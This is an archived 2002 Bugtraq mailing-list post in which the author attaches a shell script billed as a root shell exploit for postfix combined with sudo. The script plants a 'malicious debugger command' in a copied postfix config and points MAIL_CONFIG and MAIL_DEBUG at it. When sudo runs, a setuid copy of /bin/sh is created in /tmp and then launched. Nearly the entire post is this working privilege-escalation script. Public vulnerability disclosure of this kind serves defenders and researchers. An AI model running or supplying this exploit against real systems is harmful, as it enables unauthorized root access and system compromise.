[23875] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Sudo +Postfix Exploit

daemon@ATHENA.MIT.EDU (Charles 'core' Stevenson)
Wed Jan 16 13:31:08 2002

Message-ID: <3C45054A.65785932@bokeoa.com>
Date: Tue, 15 Jan 2002 21:44:58 -0700
From: "Charles 'core' Stevenson" <core@bokeoa.com>
Reply-To: core@bokeoa.com
MIME-Version: 1.0
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
        "vuln-dev@securityfocus.com" <vuln-dev@securityfocus.com>
Content-Type: multipart/mixed;
 boundary="------------CD2AFBBE022D6EFD332AE587"

--------------CD2AFBBE022D6EFD332AE587
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Took a few minutes to write something... hope you like it.

Best Regards,
Charles 'core' Stevenson
--------------CD2AFBBE022D6EFD332AE587
Content-Type: text/plain; charset=us-ascii;
 name="sudo-xpl.sh"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="sudo-xpl.sh"

#!/bin/sh
#
# root shell exploit for postfix + sudo
# tested on debian powerpc unstable
#
# by Charles 'core' Stevenson <core@bokeoa.com>

# Put your password here if you're not in the sudoers file
PASSWORD=wdnownz

echo -e "sudo exploit by core <core@bokeoa.com>\n"

echo "Setting up postfix config directory..."
/bin/cp -r /etc/postfix /tmp

echo "Adding malicious debugger command..."
echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf

echo "Setting up environment..."
export MAIL_CONFIG=/tmp/postfix
export MAIL_DEBUG=

sleep 2

echo "Trying to exploit..."
echo -e "$PASSWORD\n"|/usr/bin/sudo su -

sleep 2

echo "We should have a root shell let's check..."
ls -l /tmp/sh

echo "Cleaning up..."
rm -rf /tmp/postfix

echo "Attempting to run root shell..."
/tmp/sh

--------------CD2AFBBE022D6EFD332AE587--

home	help	back	first	fref	pref	prev	next	nref	lref	last	post